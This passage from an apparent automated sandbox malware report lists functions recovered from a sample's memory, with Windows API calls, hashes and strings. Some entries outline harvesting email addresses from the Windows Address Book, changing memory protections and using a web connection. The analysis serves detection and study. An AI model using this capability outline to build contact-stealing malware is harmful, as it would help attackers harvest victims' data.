Part of subcall function 001DE46B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001D5985,00000000,00000000,00000004,00000000,?,001D1D3E,00000000), ref: 001DE4D5
Part of subcall function 001DE46B: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE4E5

SetEvent.KERNEL32(?,001D1D3E,00000000,?,00000008,001DAA9A,?,00000000,00000008,00000008,00000000), ref: 001D59EC

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 6989612a2d9bdeec07be52eb6384ca398f923ca167e22f5113a1fdcd730d7812
Instruction ID: 77a26bf7ddf84def046ff2951a76e62897dc8e8cf0b55d19cfe312d6c3282a82
Opcode Fuzzy Hash: 6989612a2d9bdeec07be52eb6384ca398f923ca167e22f5113a1fdcd730d7812
Instruction Fuzzy Hash: 0811C232100A49EFCB356FA4DC94BAB7BAAFF04378F104626F911856A0CB31DC90DB50

Uniqueness

Uniqueness Score: 100.00%

Function 001D5E74, Relevance: 7.5, APIs: 5, Instructions: 46memoryUNIQUE

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,0000000100000040,00000001,?,?,00000000,?,?,779F5520,001C6A04), ref: 001D5E99
GetLastError.KERNEL32(?,00000000,?,?,779F5520,001C6A04), ref: 001D5EA1
VirtualQuery.KERNEL32(?,?,000000010000001C,?,00000000,?,?,779F5520,001C6A04), ref: 001D5EB8
VirtualProtect.KERNEL32(?,?,BD3F7BD2,00000001,?,00000000,?,?,779F5520,001C6A04), ref: 001D5EDD
SetLastError.KERNEL32(?,?,00000000,?,?,779F5520,001C6A04), ref: 001D5EE6

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: 34f6118e5a1937667affc19a69ed6706721314172dc5b0f2503bac5c63fbab4a
Instruction ID: 2db0e6432bae7bfb3a3b38f101d9b73b5b23ded2fc90078e0ce487e8251b4799
Opcode Fuzzy Hash: 34f6118e5a1937667affc19a69ed6706721314172dc5b0f2503bac5c63fbab4a
Instruction Fuzzy Hash: 46010C76600109FBCF11AF95DC84DDEBBBEFF583507008026F91596521D771EA54EBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001C323F, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(001E6340), ref: 001C324A
RtlLeaveCriticalSection.NTDLL(001E6340), ref: 001C325B
VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 001C3272
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 001C328C
GetLastError.KERNEL32 ref: 001C3299

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: a23f30f3a9c12093ccbacaa845a4be06c49b16595cd05c627a66ab5e0c4fa4c7
Instruction ID: 2ae3151f5afcf85d5a97380d9ff8d6d6d126f9c41fb1160524e24bcf09f73d70
Opcode Fuzzy Hash: a23f30f3a9c12093ccbacaa845a4be06c49b16595cd05c627a66ab5e0c4fa4c7
Instruction Fuzzy Hash: 1D017C75200604AFD7209F65DC45E6AB7F9EB84720B204518F656976A0C770EA019B20

Uniqueness

Uniqueness Score: 0.58%

Function 001CFC08, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3C71: InterlockedExchange.KERNEL32(?,000000FF), ref: 001D3C78

GetCurrentThreadId.KERNEL32 ref: 001CFC20
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001CFC30
CloseHandle.KERNEL32(00000000), ref: 001CFC39
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,000000FF,000000FF,001CE466), ref: 001CFC57
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,000000FF,000000FF,001CE466), ref: 001CFC64

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
String ID:
API String ID: 2588964033-0
Opcode ID: 96b04bdf929b4a4837c6e42e3b608af075a9553936aecdf3f226e5a7df3face8
Instruction ID: d613678aa6bb7474bc6dde1f3e7031841b81ecbca0a19569ae23fabea60d5ec8
Opcode Fuzzy Hash: 96b04bdf929b4a4837c6e42e3b608af075a9553936aecdf3f226e5a7df3face8
Instruction Fuzzy Hash: F0F08C70200708ABDA30ABB4CC88F1BB3BCEF14750B000A2EF991929A0C734E985DA24

Uniqueness

Uniqueness Score: 100.00%

Function 001D6F5C, Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001DAFF6,?), ref: 001D6F64
GetVersion.KERNEL32 ref: 001D6F73
GetCurrentProcessId.KERNEL32 ref: 001D6F8A
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D6FA7
GetLastError.KERNEL32 ref: 001D6FC6

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 9f9cc82e930b61bb4f9dfee8ec3aae96c6eefb834571417d9a9549ab43295479
Instruction ID: ba0f09e7c2bc0c180078cbca4389d28c247cdda3d11d25f3b3ec85dc11fb1365
Opcode Fuzzy Hash: 9f9cc82e930b61bb4f9dfee8ec3aae96c6eefb834571417d9a9549ab43295479
Instruction Fuzzy Hash: 86F0CD70680791AFDB20DFA4BCE9B1D3BA5AB14BE0F510616F60BCEAE0D77044C8CA15

Uniqueness

Uniqueness Score: 0.35%

Function 004137BD, Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004137C9

Part of subcall function 00411A14: __getptd_noexit.LIBCMT ref: 00411A17
Part of subcall function 00411A14: __amsg_exit.LIBCMT ref: 00411A24

__getptd.LIBCMT ref: 004137E0
__amsg_exit.LIBCMT ref: 004137EE
__lock.LIBCMT ref: 004137FE
__updatetlocinfoEx_nolock.LIBCMT ref: 00413812

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 1b0152b0d5cd76a2e0c35f857011dcfe0c4048b4a563dc59ad574802f48e5522
Instruction ID: b839ea2762e5323017d87f0d0815824781df08fa0c79ec77ffb471c8417286c1
Opcode Fuzzy Hash: 1b0152b0d5cd76a2e0c35f857011dcfe0c4048b4a563dc59ad574802f48e5522
Instruction Fuzzy Hash: CCF096F1904310AADB21BF69A8037CE77A07F0075AF11810FF520A76D2CB6C5AC0DA5D

Uniqueness

Uniqueness Score: 0.03%

Function 001D0699, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryUNIQUE

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,00000000), ref: 001D077C
HeapFree.KERNEL32(00000000,?,00000000,?,001E60C4,?,?,?,001C1DB9), ref: 001D07EF
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001D0800

Part of subcall function 001C468D: RtlLeaveCriticalSection.NTDLL(?), ref: 001C470A

Strings

HTTP/1.1 404 Not Found, xrefs: 001D0774

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
String ID: HTTP/1.1 404 Not Found
API String ID: 4231733408-2072751538
Opcode ID: 5cbf6d06e84e9ceb0efeca9e6587e89df66da5fba64a563ca555abd70badc3a3
Instruction ID: b6163ec19f37935f7f433c42ae53bb08bd2e8f189f9d2d93b5b089cfd727443b
Opcode Fuzzy Hash: 5cbf6d06e84e9ceb0efeca9e6587e89df66da5fba64a563ca555abd70badc3a3
Instruction Fuzzy Hash: 3C616074A00A06FFEB12DF65C981FA9B7A5BF2C744F14402AE5498AB51E771ED20DF80

Uniqueness

Uniqueness Score: 100.00%

Function 001C3D05, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memorystringUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000), ref: 001C3D22
lstrlen.KERNEL32(EMPTY,?,00000000,?,00000000,?), ref: 001C3D64
HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000), ref: 001C3D7E

Strings

EMPTY, xrefs: 001C3D5B, 001C3D63, 001C3D6B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen
String ID: EMPTY
API String ID: 3886119090-1696604233
Opcode ID: 9785849b67f616830cdd88f8124297ad80a79595ae93971e55a43ac88b2b8219
Instruction ID: 17f565030e19638185592f5ae1610e0e4ceedc064f542da00258fabeae92b936
Opcode Fuzzy Hash: 9785849b67f616830cdd88f8124297ad80a79595ae93971e55a43ac88b2b8219
Instruction Fuzzy Hash: 3101B172500188BFDB229BD5DC88DAFBF7DEB993A5B108019F91597160D3728E80E760

Uniqueness

Uniqueness Score: 100.00%

Function 00418B2C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42UNIQUELIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00418B3F

Part of subcall function 00418A9A: ___BuildCatchObjectHelper.LIBCMT ref: 00418AD0

_UnwindNestedFrames.LIBCMT ref: 00418B56

Strings

csm, xrefs: 00418B3B, 00418B50, 00418B63, 00418B81, 00418B91
csm, xrefs: 00418B2E

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: BuildCatchObject$FramesHelperNestedUnwind
String ID: csm$csm
API String ID: 3487967840-3733052814
Opcode ID: 79b91573e47ce0558b17ca9ead585eb52f89a9eaeff37e796afdab7a541cbed7
Instruction ID: f22ff905c4abc9b5fab98c3de9df202c44f214f33666351d85a8496ffba7692f
Opcode Fuzzy Hash: 79b91573e47ce0558b17ca9ead585eb52f89a9eaeff37e796afdab7a541cbed7
Instruction Fuzzy Hash: 17014B71400109BBDF125F52CD45EEB7F6AEF08344F00401AFE1815221DB3AE9B1DBA8

Uniqueness

Uniqueness Score: 100.00%

Function 001CBA28, Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 001CBA84
HeapFree.KERNEL32(00000000,?), ref: 001CBA95
HeapFree.KERNEL32(00000000,?), ref: 001CBAAD
CloseHandle.KERNEL32(?), ref: 001CBAC7
HeapFree.KERNEL32(00000000,?), ref: 001CBADC

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 5ea27177015acb8c9ff34cfc2757a56a4d560b8a8b09cb5745a99db3f1b93372
Instruction ID: f849c7169dc0d685a706e5e6cc715ea9d19d345140f5287c8d81e18e567ba0c4
Opcode Fuzzy Hash: 5ea27177015acb8c9ff34cfc2757a56a4d560b8a8b09cb5745a99db3f1b93372
Instruction Fuzzy Hash: 0A210471205521AFC721DBA9DCC9D1AFBAAFF58B10B144418F459D7A60C732ECA1CBE0

Uniqueness

Uniqueness Score: 1.79%

Function 001C6419, Relevance: 6.2, APIs: 4, Instructions: 192UNIQUE

Download Yara Rule

APIs

Part of subcall function 001C26CA: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 001C26E5
Part of subcall function 001C26CA: LoadLibraryA.KERNEL32(00000000), ref: 001C2733
Part of subcall function 001C26CA: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 001C2745
Part of subcall function 001C26CA: RegCloseKey.ADVAPI32(?), ref: 001C2796

GetLastError.KERNEL32(?,?,?), ref: 001C65A7
FreeLibrary.KERNEL32(?,?,?), ref: 001C660F

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 81837e60c4dcb7f880d22f0c89807902050d4597336d60cb8fc3e34f23af44a4
Instruction ID: ddf664acc817d8f5ee0f6a55928e19b0789fa38764900a43e835636232d41013
Opcode Fuzzy Hash: 81837e60c4dcb7f880d22f0c89807902050d4597336d60cb8fc3e34f23af44a4
Instruction Fuzzy Hash: 8371C1B5E00209EFCF10DFA4C884EAEBBB9BF58344B208569E515AB255D731EE41CB60

Uniqueness

Uniqueness Score: 100.00%

Function 001E0588, Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,001D599D,00000000,0000EA60,00000000,00000000,00000000,?,001D1D3E,00000000,?), ref: 001E0594

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

ResetEvent.KERNEL32(?,?,?,?,001D599D,00000000,0000EA60,00000000,00000000,00000000,?,001D1D3E,00000000,?,00000008,001DAA9A), ref: 001E060B
GetLastError.KERNEL32(?,?,?,001D599D,00000000,0000EA60,00000000,00000000,00000000,?,001D1D3E,00000000,?,00000008,001DAA9A,?), ref: 001E0638

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

GetLastError.KERNEL32(?,?,?,001D599D,00000000,0000EA60,00000000,00000000,00000000,?,001D1D3E,00000000,?,00000008,001DAA9A,?), ref: 001E06FA

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 17662a90329edc1efae26d1b4261ae40faf94ce317c7b27e444681697baed073
Instruction ID: 0665a24563b096ec62dc5f0d8bc410ba726e938b391e52bc1df96b3443dfbe56
Opcode Fuzzy Hash: 17662a90329edc1efae26d1b4261ae40faf94ce317c7b27e444681697baed073
Instruction Fuzzy Hash: A741A1B1500A44BFEB229FA5DC89F6F7ABDFF58304F140929F102D54A0DBB0DA94CA20

Uniqueness

Uniqueness Score: 3.53%

Function 001D3CF5, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 001D3DA2
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001D3DB8
memset.NTDLL ref: 001D3E58
memset.NTDLL ref: 001D3E68

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 4b83efe114aba8bcad6435ba9439ae93ade36f2774a303aecdee4bbefeb85d2a
Instruction ID: 0d1f2cd4b6cfb1d49db329d2602959aca4ac751f9f9960277b4e077f7a4a21a8
Opcode Fuzzy Hash: 4b83efe114aba8bcad6435ba9439ae93ade36f2774a303aecdee4bbefeb85d2a
Instruction Fuzzy Hash: C441A172A00659ABCB10DFA9CC81FDE7779EF64310F10852AF826A7280DB70DE54CB91

Uniqueness

Uniqueness Score: 0.67%

Function 001D6652, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(001E23BC,001E239C), ref: 001D6792

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

Part of subcall function 001D9173: lstrlenW.KERNEL32(?,00000000,?,?,00000000,001D0F10,00000000), ref: 001D9184
Part of subcall function 001D9173: lstrlenW.KERNEL32(001E2588,00000000,?,00000000,001D0F10,00000000), ref: 001D919B

Strings

1.0, xrefs: 001D667C
EmailAddressCollection/EmailAddress[%u]/Address, xrefs: 001D6715
A8000A, xrefs: 001D6681

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocateErrorHeapLast
String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address
API String ID: 3415590935-2884085418
Opcode ID: 8619996aa701a5bc610aad35a834a9bfc1128fa703a4a7483a1bad93c0599004
Instruction ID: ccdc05a9bb08689000e2e91f86021faa94027c7dfbb5679bf694988426d9bad8
Opcode Fuzzy Hash: 8619996aa701a5bc610aad35a834a9bfc1128fa703a4a7483a1bad93c0599004
Instruction Fuzzy Hash: E3413D74A00209AFCB10DFA4C889E6EB7B9FF88718B144499F915EB351DB75EE01CB60

Uniqueness

Uniqueness Score: 2.48%

Function 001C5459, Relevance: 6.1, APIs: 4, Instructions: 112UNIQUE

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 001C546F
GetLastError.KERNEL32 ref: 001C5488

Part of subcall function 001D43B5: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,001E0656,0000EA60,?,?,?,001D599D,00000000,0000EA60,00000000), ref: 001D43D0

ResetEvent.KERNEL32(?), ref: 001C5501
GetLastError.KERNEL32 ref: 001C551C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 93777ea1cdffd98adbd859a908bc929d9d8d9a9a773a35e66b472b3478ea88cf
Instruction ID: e7ef70d131f4ee31a11abb15194c26a4bfa802c41a9d09d896166c1d6b29b89c
Opcode Fuzzy Hash: 93777ea1cdffd98adbd859a908bc929d9d8d9a9a773a35e66b472b3478ea88cf
Instruction Fuzzy Hash: 33318532A40A04AFCB21DFA4CC44F6E77BBBFA4354F15452CE556D7190EB70EA819B50

Uniqueness

Uniqueness Score: 23.02%

Function 001C3BCF, Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 001C3C16
_strupr.NTDLL ref: 001C3C68
_strupr.NTDLL ref: 001C3CA3
_strupr.NTDLL ref: 001C3CD9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: 4004ca5ed9bc39a302e59225d39d07a4dbe796472eceb0331a9d9da4de1f2556
Instruction ID: 0ff6e4d9836c8d3b5011b228124b47c92017f1c1578e869342c1d023fd2d25e4
Opcode Fuzzy Hash: 4004ca5ed9bc39a302e59225d39d07a4dbe796472eceb0331a9d9da4de1f2556
Instruction Fuzzy Hash: 364160329006499BCB24DF68D884FED77BAFF24344F24802BE935E6161D734EA44CB95

Uniqueness

Uniqueness Score: 0.70%

Function 001C5EB3, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,00000000,00004000,?,?,?,?,001D4FEF,?,?,?,001CA9BE,?,?), ref: 001C5ECA
SetEvent.KERNEL32(00000000,?,?,?,001D4FEF,?,?,?,001CA9BE,?,?), ref: 001C5EDA
GetLastError.KERNEL32 ref: 001C5F63

Part of subcall function 001D43B5: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,001E0656,0000EA60,?,?,?,001D599D,00000000,0000EA60,00000000), ref: 001D43D0

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

GetLastError.KERNEL32(00000000), ref: 001C5F98

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 9926cf5ae8922c74449bdbb32dc8ff21bc8dfe14ecd3c62cb1305b59fcdfe84c
Instruction ID: aced52c77eb83be7a1b2150d38359d096cc737ed312a07af517e70ecee812b13
Opcode Fuzzy Hash: 9926cf5ae8922c74449bdbb32dc8ff21bc8dfe14ecd3c62cb1305b59fcdfe84c
Instruction Fuzzy Hash: 96310DB1900609EFDB24DF95C881E9EF7B9EB18340F10856EE541D2551D770EA89DB21

Uniqueness

Uniqueness Score: 0.80%

Function 001D69FF, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 001D6A2E
SetEvent.KERNEL32(?), ref: 001D6A78
TlsSetValue.KERNEL32(00000001), ref: 001D6AB2
TlsSetValue.KERNEL32(00000000), ref: 001D6ACE

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 8346f89a8379289b2b6933c3f7bd1b39252c8bfa078611998959b3ac51e90af7
Instruction ID: f0d70bf1af8adac871fd76f0b21cae57da3889ce90d73c541c954fb37a0c7bd0
Opcode Fuzzy Hash: 8346f89a8379289b2b6933c3f7bd1b39252c8bfa078611998959b3ac51e90af7
Instruction Fuzzy Hash: E621DE31100255AFCB25CF58CC85A5E7BA6FF51360B64842AF682EBA70D771EC91DB10

Uniqueness

Uniqueness Score: 2.59%

Function 001C4D20, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C4D79
memcpy.NTDLL(00000018,?,?), ref: 001C4DA2
RegisterWaitForSingleObject.KERNEL32(00000010,?,001D6FCF,00000000,000000FF,00000008), ref: 001C4DE1
HeapFree.KERNEL32(00000000,00000000), ref: 001C4DF4

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: 7c614d227444a64858e3da91f207a388d105eb97bed43e6983a519fcac7e85c6
Instruction ID: 98b9f3d0f12e0d24f2f4bfbf502c49676525f49d5436eef7218d45dbc7a78f43
Opcode Fuzzy Hash: 7c614d227444a64858e3da91f207a388d105eb97bed43e6983a519fcac7e85c6
Instruction Fuzzy Hash: 6F31CE30200705AFDB20CF68DC94F9E7BA9FF25364F008129F926DA6A0C770E955CBA0

Uniqueness

Uniqueness Score: 1.85%

Function 001CFB1C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001CB3FB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CB42D
Part of subcall function 001CB3FB: HeapFree.KERNEL32(00000000,00000000,?,?,001C336A,?,00000022,00000000,00000000,00000000,?,?), ref: 001CB452

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 001CFBD0
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 001CFBF4
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,001C226F,?,?,?,?,?,?,?), ref: 001CFBFF

Strings

https://, xrefs: 001CFB49

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: 99d610b7ed0298e00023cccbff2c61ac42fa944e126141a6abaee131167c76c1
Instruction ID: 4b7c968a2ba1c09cc09988e630336a5cb3b72f8a7363dacaf10dcac91b35b07c
Opcode Fuzzy Hash: 99d610b7ed0298e00023cccbff2c61ac42fa944e126141a6abaee131167c76c1
Instruction Fuzzy Hash: DD21BD31501248BFEB219F50CC86F9E3B6AEF20754F10802CF9046A1E1C7B5CE82DBA5

Uniqueness

Uniqueness Score: 12.89%

Function 001DC183, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001DC1B2
lstrlen.KERNEL32(00000000), ref: 001DC1C2

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

strcpy.NTDLL ref: 001DC1D9
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 001DC1E3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: 24e8cd2be1db7f08f4dec3f9fc205554a88fd1d5e1574c5d1e2ed2f93b435cf9
Instruction ID: e884bbf50beadd116e44f4875f77d608ba4b8650bdae971e29a0b180a1cfdb4d
Opcode Fuzzy Hash: 24e8cd2be1db7f08f4dec3f9fc205554a88fd1d5e1574c5d1e2ed2f93b435cf9
Instruction Fuzzy Hash: 1321F576104702AFD7106BE8DC89B2AB7B8EF54350F14891EF85687391EB74D840CB91

Uniqueness

Uniqueness Score: 4.31%

Function 001E01AB, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001E01C1
RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001E01DC
GetLastError.KERNEL32 ref: 001E024A
GetLastError.KERNEL32 ref: 001E0259

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: da6defb8d9ed5df30eafae96931fc63f530e4c2f3f7294eee5e4ad14f2c9c5d0
Instruction ID: a4a45dabb3222469cc4854c5d53ed5e90dc460c75cb37c9e67ac0955c37b97c6
Opcode Fuzzy Hash: da6defb8d9ed5df30eafae96931fc63f530e4c2f3f7294eee5e4ad14f2c9c5d0
Instruction Fuzzy Hash: 37219F3190058AEFCB12CF95DC88A9E7BF8FF58710F118145FA02A7250C771DA91DB91

Uniqueness

Uniqueness Score: 0.93%

Function 001CCD9E, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001CCDC0
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001CCE04
